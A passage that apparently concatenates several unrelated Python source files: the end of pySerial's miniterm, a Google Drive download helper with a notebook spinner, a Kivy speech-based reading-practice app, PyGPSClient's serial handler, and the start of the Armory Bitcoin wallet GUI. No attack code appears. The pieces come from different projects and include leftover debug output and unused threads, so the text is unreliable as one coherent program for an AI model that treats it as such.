--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from an other script
# e.g to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
|
download.py
|
import threading
import cursor
from halo import Halo
from halo._utils import decode_utf_8_text
from ipywidgets.widgets import Output
from IPython.display import display
def download_file_from_google_drive(gid, destination):
import requests
GGL_URL = "https://docs.google.com/uc?export=download"
CHUNK_SIZE = 32768
def get_confirm_token(response):
for key, value in response.cookies.items():
if key.startswith('download_warning'):
return value
return None
print('asasas')
session = requests.Session()
response = session.get(GGL_URL, params = { 'id': gid }, stream = True)
if not response.status_code == requests.codes.ok:
raise requests.ConnectionError('Invalid request')
token = get_confirm_token(response)
if token:
response = session.get(GGL_URL, params = { 'id': gid, 'confirm': token }, stream = True)
with open(destination, "wb") as f:
for chunk in response.iter_content(CHUNK_SIZE):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
class HaloNotebook(Halo):
CLEAR_LINE = '\033[K'
def __init__(self, text='', color='cyan', spinner=None, animation=None, interval=-1, enabled=True, stream=None):
super(HaloNotebook, self).__init__(text, color, spinner, animation, interval, enabled, stream)
self.output = self._make_output_widget()
def _make_output_widget(self):
return Output()
# TODO: using property and setter
def _output(self, text=''):
return ({'name': 'stdout', 'output_type': 'stream', 'text': text},)
def clear(self):
if not self._enabled:
return self
with self.output:
self.output.outputs += self._output('\r')
self.output.outputs += self._output(self.CLEAR_LINE)
self.output.outputs = self._output()
return self
def _render_frame(self):
frame = self.frame()
output = '\r{0}'.format(frame)
with self.output:
self.output.outputs += self._output(output)
def start(self, text=None):
if text is not None:
self._text = self._get_text(text, animation=None)
if not self._enabled or self._spinner_id is not None:
return self
if self._stream.isatty():
cursor.hide()
self.output = self._make_output_widget()
display(self.output)
self._stop_spinner = threading.Event()
self._spinner_thread = threading.Thread(target=self.render)
self._spinner_thread.setDaemon(True)
self._render_frame()
self._spinner_id = self._spinner_thread.name
self._spinner_thread.start()
return self
def stop_and_persist(self, options={}):
if type(options) is not dict:
raise TypeError('Options passed must be a dictionary')
if 'symbol' in options and options['symbol'] is not None:
symbol = decode_utf_8_text(options['symbol'])
else:
symbol = ' '
if 'text' in options and options['text'] is not None:
text = decode_utf_8_text(options['text'])
else:
text = self._text['original']
text = text.strip()
self.stop()
output = '\r{0} {1}\n'.format(symbol, text)
with self.output:
self.output.outputs = self._output(output)
|
frontEnd.py
|
from __future__ import division
from random import random
from kivy.app import App
from kivy.lang import Builder
from kivy.uix.screenmanager import ScreenManager, Screen, FadeTransition
from kivy.uix.widget import Widget
from kivy.graphics import Line, Color, Ellipse
from kivy.uix.boxlayout import BoxLayout
from kivy.properties import StringProperty
import threading
import passages
import queue
from google.cloud import speech
from google.cloud.speech import enums
from google.cloud.speech import types
from google.cloud import texttospeech
from googlestreaming import MicrophoneStream
import requests
from PassageReader import match, generatePronun, passageCheck, getWord, initializeStream
from ForeignPassageReader import generatePronun as fgeneratePronun, passageCheck as fpassageCheck, getWord as fgetWord
RATE = 16000
CHUNK = int(RATE / 10) # 100ms
class Painter(Widget):
def on_touch_down(self, touch):
color = (random(), 1.,1.) #reduce number of possible colors
with self.canvas:
Color(*color, mode='hsv') #sets the colors to be equally bright
d = 30.
Ellipse(pos=(touch.x - d / 2,touch.y - d / 2), size=(d,d))
touch.ud["line"] = Line(points=(touch.x, touch.y))
def on_touch_move(self, touch):
touch.ud["line"].points += [touch.x, touch.y]
class MainScreen(Screen):
pass
class EnglishScreen(Screen):
passage_label = StringProperty()
input_label = StringProperty()
help_label = StringProperty()
streamthread = threading.Thread
def startReading(self):
target = self.passage_label
output = []
self.streamthread = threading.Thread(target=(lambda p, q: q.append(self.startStream())), args=(self, output), kwargs={})
self.streamthread.start()
thr = threading.Thread(target=self.streamListener)
def streamListener(self):
while self.streamthread.is_alive():
pass
def startStream(self):
def read(responses, passage):
missed = []
passage_index = 0
self.passage_label = str(".\n".join(passage[passage_index:])+".")
for response in responses:
if not response.results:
continue
result = response.results[0]
if not result.alternatives:
continue
if result.is_final:
print(result.alternatives[0].transcript)
print(passageCheck(passage[passage_index], result.alternatives[0].transcript))
comp_result = passageCheck(passage[passage_index], result.alternatives[0].transcript)
missed += comp_result[0]
if not comp_result[1]:
passage_index += 1
else:
passage[passage_index] = " ".join(comp_result[1])
generatePronun(comp_result[1][0])
missed += comp_result[1][0]
self.help_label = str("Tip: "+ " ".join(getWord(comp_result[1][0]))) # call dictionary lookup
self.input_label = result.alternatives[0].transcript
if passage_index<len(passage):
self.passage_label = str(".\n".join(passage[passage_index:]) + ".")
if passage_index == len(passage):
self.passage_label = str("")
return missed
language_code = 'en-US' # a BCP-47 language tag
client = speech.SpeechClient()
config = types.RecognitionConfig(
encoding=enums.RecognitionConfig.AudioEncoding.LINEAR16,
sample_rate_hertz=RATE,
language_code=language_code)
streaming_config = types.StreamingRecognitionConfig(
config=config,
interim_results=True)
with MicrophoneStream(RATE, CHUNK) as stream:
audio_generator = stream.generator()
requests = (types.StreamingRecognizeRequest(audio_content=content)
for content in audio_generator)
responses = client.streaming_recognize(streaming_config, requests)
# Now, put the transcription responses to use.
finals = read(responses, passages.english)
return (finals)
class ChineseScreen(Screen):
passage_label = StringProperty()
help_label = StringProperty()
input_label = StringProperty()
streamthread = threading.Thread
def startReading(self):
target = self.passage_label
output = []
self.streamthread = threading.Thread(target=(lambda p, q: q.append(self.startStream())), args=(self, output),
kwargs={})
self.streamthread.start()
thr = threading.Thread(target=self.streamListener)
def streamListener(self):
while self.streamthread.is_alive():
pass
def startStream(self):
def read(responses, passage, lang):
missed = []
passage_index = 0
transcript_index = 0
self.passage_label = str(".\n".join(passage[passage_index:])+".")
for response in responses:
# print(response.results[0])
if not response.results:
continue
result = response.results[0]
if not result.alternatives:
continue
if result.stability >= 0.80:
print(result.alternatives[0].transcript[transcript_index:])
transcript = result.alternatives[0].transcript
print(transcript_index)
print(passageCheck(passage[passage_index], transcript[transcript_index:]))
comp_result = passageCheck(passage[passage_index], transcript[transcript_index:])
if not comp_result[1]:
passage_index += 1
else:
passage[passage_index] = "".join(comp_result[1])
fgeneratePronun(comp_result[1][0], lang)
self.help_label = str("Tip: "+ " ".join(fgetWord(comp_result[1][0], lang))) # call dictionary lookup # call dictionary lookup
self.input_label = result.alternatives[0].transcript[transcript_index:]
transcript_index = len(transcript)
if passage_index<len(passage):
self.passage_label = str(".\n".join(passage[passage_index:]) + ".")
if passage_index == len(passage):
self.passage_label = str("")
return missed
language_code = 'zh' # a BCP-47 language tag 'zh' 'ja-JP'
passage = passages.chinese
passageIndex = 0
client = speech.SpeechClient()
config = types.RecognitionConfig(
encoding=enums.RecognitionConfig.AudioEncoding.LINEAR16,
sample_rate_hertz=RATE,
language_code=language_code)
streaming_config = types.StreamingRecognitionConfig(
config=config,
interim_results=True)
with MicrophoneStream(RATE, CHUNK) as stream:
audio_generator = stream.generator()
requests = (types.StreamingRecognizeRequest(audio_content=content)
for content in audio_generator)
responses = client.streaming_recognize(streaming_config, requests)
# Now, put the transcription responses to use.
finals = read(responses, passage, 'zh')
return finals
class JapaneseScreen(Screen):
passage_label = StringProperty()
help_label = StringProperty()
input_label = StringProperty()
streamthread = threading.Thread
def startReading(self):
target = self.passage_label
output = []
self.streamthread = threading.Thread(target=(lambda p, q: q.append(self.startStream())), args=(self, output),
kwargs={})
self.streamthread.start()
thr = threading.Thread(target=self.streamListener)
def streamListener(self):
while self.streamthread.is_alive():
pass
def startStream(self):
def read(responses, passage, lang):
missed = []
passage_index = 0
transcript_index = 0
self.passage_label = str(".\n".join(passage[passage_index:]) + ".")
for response in responses:
# print(response.results[0])
if not response.results:
continue
result = response.results[0]
if not result.alternatives:
continue
if result.stability >= 0.80:
print(result.alternatives[0].transcript[transcript_index:])
transcript = result.alternatives[0].transcript
print(transcript_index)
print(passageCheck(passage[passage_index], transcript[transcript_index:]))
comp_result = passageCheck(passage[passage_index], transcript[transcript_index:])
if not comp_result[1]:
passage_index += 1
else:
passage[passage_index] = "".join(comp_result[1])
fgeneratePronun(comp_result[1][0], lang)
self.help_label = str("Tip: " + " ".join(
fgetWord(comp_result[1][0], lang))) # call dictionary lookup # call dictionary lookup
self.input_label = result.alternatives[0].transcript[transcript_index:]
transcript_index = len(transcript)
if passage_index < len(passage):
self.passage_label = str(".\n".join(passage[passage_index:]) + ".")
if passage_index == len(passage):
self.passage_label = str("")
return missed
language_code = 'ja-JP' # a BCP-47 language tag 'zh' 'ja-JP'
passage = passages.japanese
passageIndex = 0
client = speech.SpeechClient()
config = types.RecognitionConfig(
encoding=enums.RecognitionConfig.AudioEncoding.LINEAR16,
sample_rate_hertz=RATE,
language_code=language_code)
streaming_config = types.StreamingRecognitionConfig(
config=config,
interim_results=True)
with MicrophoneStream(RATE, CHUNK) as stream:
audio_generator = stream.generator()
requests = (types.StreamingRecognizeRequest(audio_content=content)
for content in audio_generator)
responses = client.streaming_recognize(streaming_config, requests)
# Now, put the transcription responses to use.
finals = read(responses, passage, 'ja')
return finals
class SummaryScreen(Screen):
pass
class ScreenManagement(ScreenManager):
pass
with open("floating.kv", encoding="utf-8") as f:
presentation = Builder.load_string(f.read()) #load the kivy file
class SimpleKivy7(App):
def build(self):
return presentation
if __name__== "__main__":
SimpleKivy7().run()
|
serial_handler.py
|
"""
SerialHandler class for PyGPSClient application
This handles all the serial i/o , threaded read process and direction to
the appropriate protocol handler
Created on 16 Sep 2020
:author: semuadmin
:copyright: SEMU Consulting © 2020
:license: BSD 3-Clause
"""
from io import BufferedReader
from threading import Thread
from serial import Serial, SerialException, SerialTimeoutException
import pyubx2.ubxtypes_core as ubt
from .globals import (
CONNECTED,
CONNECTED_FILE,
DISCONNECTED,
NMEA_PROTOCOL,
MIXED_PROTOCOL,
UBX_PROTOCOL,
)
from .strings import STOPDATA, NOTCONN, SEROPENERROR, ENDOFFILE
class SerialHandler:
"""
Serial handler class.
"""
def __init__(self, app):
"""
Constructor.
:param Frame app: reference to main tkinter application
"""
self.__app = app # Reference to main application class
self.__master = self.__app.get_master() # Reference to root class (Tk)
self._serial_object = None
self._serial_buffer = None
self._serial_thread = None
self._file_thread = None
self._connected = False
self._reading = False
def __del__(self):
"""
Destructor.
"""
if self._serial_thread is not None:
self._reading = False
self._serial_thread = None
self.disconnect()
def connect(self):
"""
Open serial connection.
"""
serial_settings = self.__app.frm_settings.serial_settings()
try:
self._serial_object = Serial(
serial_settings.port,
serial_settings.bpsrate,
bytesize=serial_settings.databits,
stopbits=serial_settings.stopbits,
parity=serial_settings.parity,
xonxoff=serial_settings.xonxoff,
rtscts=serial_settings.rtscts,
timeout=serial_settings.timeout,
)
self._serial_buffer = BufferedReader(self._serial_object)
self.__app.frm_banner.update_conn_status(CONNECTED)
self.__app.set_connection(
(
f"{serial_settings.port}:{serial_settings.port_desc} "
+ f"@ {str(serial_settings.bpsrate)}"
),
"green",
)
self.__app.frm_settings.enable_controls(CONNECTED)
self._connected = True
self.start_read_thread()
if self.__app.frm_settings.datalogging:
self.__app.file_handler.open_logfile_output()
if self.__app.frm_settings.record_track:
self.__app.file_handler.open_trackfile()
except (IOError, SerialException, SerialTimeoutException) as err:
self._connected = False
self.__app.set_connection(
(
f"{serial_settings.port}:{serial_settings.port_desc} "
+ f"@ {str(serial_settings.baudrate)}"
),
"red",
)
self.__app.set_status(SEROPENERROR.format(err), "red")
self.__app.frm_banner.update_conn_status(DISCONNECTED)
self.__app.frm_settings.enable_controls(DISCONNECTED)
def connect_file(self):
"""
Open binary data file connection.
"""
logpath = self.__app.frm_settings.logpath
try:
self._serial_object = open(logpath, "rb")
self._serial_buffer = BufferedReader(self._serial_object)
self.__app.frm_banner.update_conn_status(CONNECTED_FILE)
self.__app.set_connection(f"{logpath}", "blue")
self.__app.frm_settings.enable_controls(CONNECTED_FILE)
self._connected = True
self.start_readfile_thread()
if self.__app.frm_settings.record_track:
self.__app.file_handler.open_trackfile()
except (IOError, SerialException, SerialTimeoutException) as err:
self._connected = False
self.__app.set_connection(f"{logpath}", "red")
self.__app.set_status(SEROPENERROR.format(err), "red")
self.__app.frm_banner.update_conn_status(DISCONNECTED)
self.__app.frm_settings.enable_controls(DISCONNECTED)
def disconnect(self):
"""
Close serial connection.
"""
if self._connected:
try:
self._reading = False
self._serial_object.close()
self.__app.frm_banner.update_conn_status(DISCONNECTED)
self.__app.set_connection(NOTCONN, "red")
self.__app.set_status("", "blue")
if self.__app.frm_settings.datalogging:
self.__app.file_handler.close_logfile()
if self.__app.frm_settings.record_track:
self.__app.file_handler.close_trackfile()
except (SerialException, SerialTimeoutException):
pass
self._connected = False
self.__app.frm_settings.enable_controls(self._connected)
@property
def port(self):
"""
Getter for port
"""
return self.__app.frm_settings.serial_settings().port
@property
def connected(self):
"""
Getter for connection status
"""
return self._connected
@property
def serial(self):
"""
Getter for serial object
"""
return self._serial_object
@property
def buffer(self):
"""
Getter for serial buffer
"""
return self._serial_buffer
@property
def thread(self):
"""
Getter for serial thread
"""
return self._serial_thread
def serial_write(self, data: bytes):
"""
Write binary data to serial port.
:param bytes data: data to write to stream
"""
try:
self._serial_object.write(data)
except (SerialException, SerialTimeoutException) as err:
print(f"Error writing to serial port {err}")
def start_read_thread(self):
"""
Start the serial reader thread.
"""
if self._connected:
self._reading = True
self.__app.frm_mapview.reset_map_refresh()
self._serial_thread = Thread(target=self._read_thread, daemon=True)
self._serial_thread.start()
def start_readfile_thread(self):
"""
Start the file reader thread.
"""
if self._connected:
self._reading = True
self.__app.frm_mapview.reset_map_refresh()
self._file_thread = Thread(target=self._readfile_thread, daemon=True)
self._file_thread.start()
def stop_read_thread(self):
"""
Stop serial reader thread.
"""
if self._serial_thread is not None:
self._reading = False
self._serial_thread = None
self.__app.set_status(STOPDATA, "red")
def stop_readfile_thread(self):
"""
Stop file reader thread.
"""
if self._file_thread is not None:
self._reading = False
self._file_thread = None
self.__app.set_status(STOPDATA, "red")
def _read_thread(self):
"""
THREADED PROCESS
Reads binary data from serial port and generates virtual event to
trigger data parsing and widget updates.
"""
try:
# print(f"DEBUG doing serial_handler._read_thread")
while self._reading and self._serial_object:
# print(f"DEBUG doing serial_handler._read_thread while loop")
if self._serial_object.in_waiting:
# print(f"DEBUG Bytes in buffer: {self._serial_object.in_waiting}")
# print(f"DEBUG doing serial_handler._read_thread in_waiting")
self.__master.event_generate("<<ubx_read>>")
except SerialException as err:
self.__app.set_status(f"Error in read thread {err}", "red")
# spurious errors as thread shuts down after serial disconnection
except (TypeError, OSError) as err:
pass
def _readfile_thread(self):
"""
THREADED PROCESS
Reads binary data from datalog file and generates virtual event to
trigger data parsing and widget updates.
"""
# print(f"DEBUG doing serial_handler._readfile_thread")
while self._reading and self._serial_object:
# print(f"DEBUG doing serial_handler._readfile_thread while loop")
self.__master.event_generate("<<ubx_readfile>>")
def on_read(self, event): # pylint: disable=unused-argument
"""
Action on <<ubx_read>> event - read any data in the buffer.
:param event event: read event
"""
# print(f"DEBUG doing serial_handler.on_read")
if self._reading and self._serial_object is not None:
try:
self._parse_data(self._serial_buffer)
except SerialException as err:
self.__app.set_status(f"Error {err}", "red")
def on_eof(self, event): # pylint: disable=unused-argument
"""
Action on end of file
:param event event: eof event
"""
# print(f"DEBUG doing serial_handler.on_eof")
self.disconnect()
self.__app.set_status(ENDOFFILE, "blue")
def _parse_data(self, ser: Serial):
"""
Read the binary data and direct to the appropriate
UBX and/or NMEA protocol handler, depending on which protocols
are filtered.
:param Serial ser: serial port
"""
# print(f"DEBUG doing serial_handler_parse_data")
parsing = True
raw_data = None
byte1 = ser.read(1) # read first byte to determine protocol
if len(byte1) < 1:
self.__master.event_generate("<<ubx_eof>>")
return
while parsing:
filt = self.__app.frm_settings.protocol
byte2 = ser.read(1)
if len(byte2) < 1:
self.__master.event_generate("<<ubx_eof>>")
return
# if it's a UBX message (b'\b5\x62')
if byte1 == b"\xb5" and byte2 == b"\x62":
# print(f"DEBUG doing ubx serial_handler._parse_data if ubx {ser.peek()}")
byten = ser.read(4)
# print(f"DEBUG first byten = {byten}, len = {len(byten)}, need 4")
if len(byten) < 4:
self.__master.event_generate("<<ubx_eof>>")
parsing = False
break
clsid = byten[0:1]
msgid = byten[1:2]
lenb = byten[2:4]
leni = int.from_bytes(lenb, "little", signed=False)
byten = ser.read(leni + 2)
# print(f"DEBUG second byten = {byten}, len = {len(byten)}, need {leni +2 }")
if len(byten) < leni + 2:
self.__master.event_generate("<<ubx_eof>>")
parsing = False
break
plb = byten[0:leni]
cksum = byten[leni : leni + 2]
raw_data = ubt.UBX_HDR + clsid + msgid + lenb + plb + cksum
if filt in (UBX_PROTOCOL, MIXED_PROTOCOL):
self.__app.ubx_handler.process_data(raw_data)
parsing = False
# if it's an NMEA message ('$G' or '$P')
elif byte1 == b"\x24" and byte2 in (b"\x47", b"\x50"):
# print(f"DEBUG doing nmea serial_handler._parse_data if nmea {ser.peek()}")
raw_data = byte1 + byte2 + ser.readline()
if filt in (NMEA_PROTOCOL, MIXED_PROTOCOL):
self.__app.nmea_handler.process_data(raw_data)
parsing = False
# else drop it like it's hot
else:
# print(f"DEBUG dropping {ser.peek()}")
parsing = False
# if datalogging, write to log file
if self.__app.frm_settings.datalogging and raw_data is not None:
self.__app.file_handler.write_logfile(raw_data)
def flush(self):
"""
Flush input buffer
"""
if self._serial_buffer is not None:
self._serial_buffer.flush()
if self._serial_object is not None:
self._serial_object.flushInput()
|
ArmoryQt.py
|
#! /usr/bin/python
# -*- coding: UTF-8 -*-
##############################################################################
# #
# Copyright (C) 2011-2015, Armory Technologies, Inc. #
# Distributed under the GNU Affero General Public License (AGPL v3) #
# See LICENSE or http://www.gnu.org/licenses/agpl.html #
# #
# Copyright (C) 2016-17, goatpig #
# Distributed under the MIT license #
# See LICENSE-MIT or https://opensource.org/licenses/MIT #
# #
##############################################################################
import gettext
from copy import deepcopy
from datetime import datetime
import hashlib
import logging
import math
import os
import platform
import random
import shutil
import signal
import socket
import subprocess
import sys
import threading
import time
import traceback
import glob
from PyQt4.QtCore import *
from PyQt4.QtGui import *
import psutil
import CppBlockUtils as Cpp
from armorycolors import Colors, htmlColor, QAPP
from armoryengine.ALL import *
from armoryengine.Block import PyBlock
from armoryengine.Decorators import RemoveRepeatingExtensions
from armoryengine.PyBtcWalletRecovery import WalletConsistencyCheck
from SDM import SatoshiDaemonManager
from ui.QtExecuteSignal import QtExecuteSignal
# Setup translations
translator = QTranslator(QAPP)
app_dir = "./"
try:
app_dir = os.path.dirname(os.path.realpath(__file__))
except:
if OS_WINDOWS and getattr(sys, 'frozen', False):
app_dir = os.path.dirname(sys.executable)
translator.load(GUI_LANGUAGE, os.path.join(app_dir, "lang/"))
QAPP.installTranslator(translator)
from armorymodels import *
from jasvet import verifySignature
import qrc_img_resources
from qtdefines import *
from qtdialogs import *
from ui.MultiSigDialogs import DlgSelectMultiSigOption, DlgLockboxManager, \
DlgMergePromNotes, DlgCreatePromNote, DlgImportAsciiBlock
from ui.Wizards import WalletWizard, TxWizard
from ui.toolsDialogs import MessageSigningVerificationDialog
from dynamicImport import MODULE_PATH_KEY, ZIP_EXTENSION, getModuleList, importModule,\
verifyZipSignature, MODULE_ZIP_STATUS, INNER_ZIP_FILENAME,\
MODULE_ZIP_STATUS_KEY, getModuleListNoZip, dynamicImportNoZip
import tempfile
# Set URL handler to warn before opening url
handler = URLHandler()
QDesktopServices.setUrlHandler("http", handler.handleURL)
QDesktopServices.setUrlHandler("https", handler.handleURL)
# Load our framework with OS X-specific code.
if OS_MACOSX:
import ArmoryMac
# HACK ALERT: Qt has a bug in OS X where the system font settings will override
# the app's settings when a window is activated (e.g., Armory starts, the user
# switches to another app, and then switches back to Armory). There is a
# workaround, as used by TeXstudio and other programs.
# https://bugreports.qt-project.org/browse/QTBUG-5469 - Bug discussion.
# http://sourceforge.net/p/texstudio/bugs/594/?page=1 - Fix is mentioned.
# http://pyqt.sourceforge.net/Docs/PyQt4/qapplication.html#setDesktopSettingsAware
# - Mentions that this must be called before the app (QAPP) is created.
QApplication.setDesktopSettingsAware(False)
if OS_WINDOWS:
from _winreg import *
MODULES_ZIP_DIR_NAME = 'modules'
class ArmoryMainWindow(QMainWindow):
""" The primary Armory window """
#############################################################################
def __init__(self, parent=None, splashScreen=None):
super(ArmoryMainWindow, self).__init__(parent)
self.isShuttingDown = False
# Load the settings file
self.settingsPath = CLI_OPTIONS.settingsPath
self.settings = SettingsFile(self.settingsPath)
# SETUP THE WINDOWS DECORATIONS
self.lblLogoIcon = QLabel()
if USE_TESTNET:
self.setWindowTitle('Armory - Bitcoin Wallet Management [TESTNET] dlgMain')
self.iconfile = ':/armory_icon_green_32x32.png'
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_green_h56.png'))
if Colors.isDarkBkgd:
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_white_text_green_h56.png'))
elif USE_REGTEST:
self.setWindowTitle('Armory - Bitcoin Wallet Management [REGTEST] dlgMain')
self.iconfile = ':/armory_icon_green_32x32.png'
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_green_h56.png'))
if Colors.isDarkBkgd:
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_white_text_green_h56.png'))
else:
self.setWindowTitle('Armory - Bitcoin Wallet Management')
self.iconfile = ':/armory_icon_32x32.png'
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_h44.png'))
if Colors.isDarkBkgd:
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_white_text_h56.png'))
# OS X requires some Objective-C code if we're switching to the testnet
# (green) icon. We should also use a larger icon. Otherwise, Info.plist
# takes care of everything.
if not OS_MACOSX:
self.setWindowIcon(QIcon(self.iconfile))
else:
if USE_TESTNET or USE_REGTEST:
self.iconfile = ':/armory_icon_green_fullres.png'
ArmoryMac.MacDockIconHandler.instance().setMainWindow(self)
ArmoryMac.MacDockIconHandler.instance().setIcon(QIcon(self.iconfile))
self.lblLogoIcon.setAlignment(Qt.AlignHCenter | Qt.AlignVCenter)
self.netMode = NETWORKMODE.Offline
self.abortLoad = False
self.memPoolInit = False
self.needUpdateAfterScan = True
self.sweepAfterScanList = []
self.newWalletList = []
self.newZeroConfSinceLastUpdate = []
self.lastSDMStr = ""
self.doShutdown = False
self.downloadDict = {}
self.notAvailErrorCount = 0
self.satoshiVerWarnAlready = False
self.satoshiLatestVer = None
self.latestVer = {}
self.downloadDict = {}
self.satoshiHomePath = None
self.satoshiExeSearchPath = None
self.initSyncCircBuff = []
self.latestVer = {}
self.lastVersionsTxtHash = ''
self.dlgCptWlt = None
self.wasSynchronizing = False
self.entropyAccum = []
self.allLockboxes = []
self.lockboxIDMap = {}
self.cppLockboxWltMap = {}
self.broadcasting = {}
self.nodeStatus = None
self.numHeartBeat = 0
# Error and exit on both regtest and testnet
if USE_TESTNET and USE_REGTEST:
DlgRegAndTest(self, self).exec_()
# Full list of notifications, and notify IDs that should trigger popups
# when sending or receiving.
self.changelog = []
self.downloadLinks = {}
self.almostFullNotificationList = {}
self.notifyOnSend = set()
self.notifyonRecv = set()
self.versionNotification = {}
self.notifyIgnoreLong = []
self.notifyIgnoreShort = []
self.maxPriorityID = None
self.satoshiVersions = ['',''] # [curr, avail]
self.armoryVersions = [getVersionString(BTCARMORY_VERSION), '']
self.tempModulesDirName = None
self.internetStatus = None
self.lockboxLedgModel = None
#delayed URI parsing dict
self.delayedURIData = {}
self.delayedURIData['qLen'] = 0
#Setup the signal to spawn progress dialogs from the main thread
self.connect(self, SIGNAL('initTrigger') , self.initTrigger)
self.connect(self, SIGNAL('execTrigger'), self.execTrigger)
self.connect(self, SIGNAL('checkForNegImports'), self.checkForNegImports)
'''
With Qt, all GUI operations need to happen in the main thread. If
the GUI operation is triggered from another thread, it needs to
emit a Qt signal, so that Qt can schedule the operation in the main
thread. QtExecuteSignal is a utility class that handles the signaling
and delaying/threading of execution
'''
self.signalExecution = QtExecuteSignal(self)
#push model BDM notify signal
def cppNotifySignal(action, arglist):
self.signalExecution.executeMethod(\
self.handleCppNotification, action, arglist)
TheBDM.registerCppNotification(cppNotifySignal)
# We want to determine whether the user just upgraded to a new version
self.firstLoadNewVersion = False
currVerStr = 'v'+getVersionString(BTCARMORY_VERSION)
if self.settings.hasSetting('LastVersionLoad'):
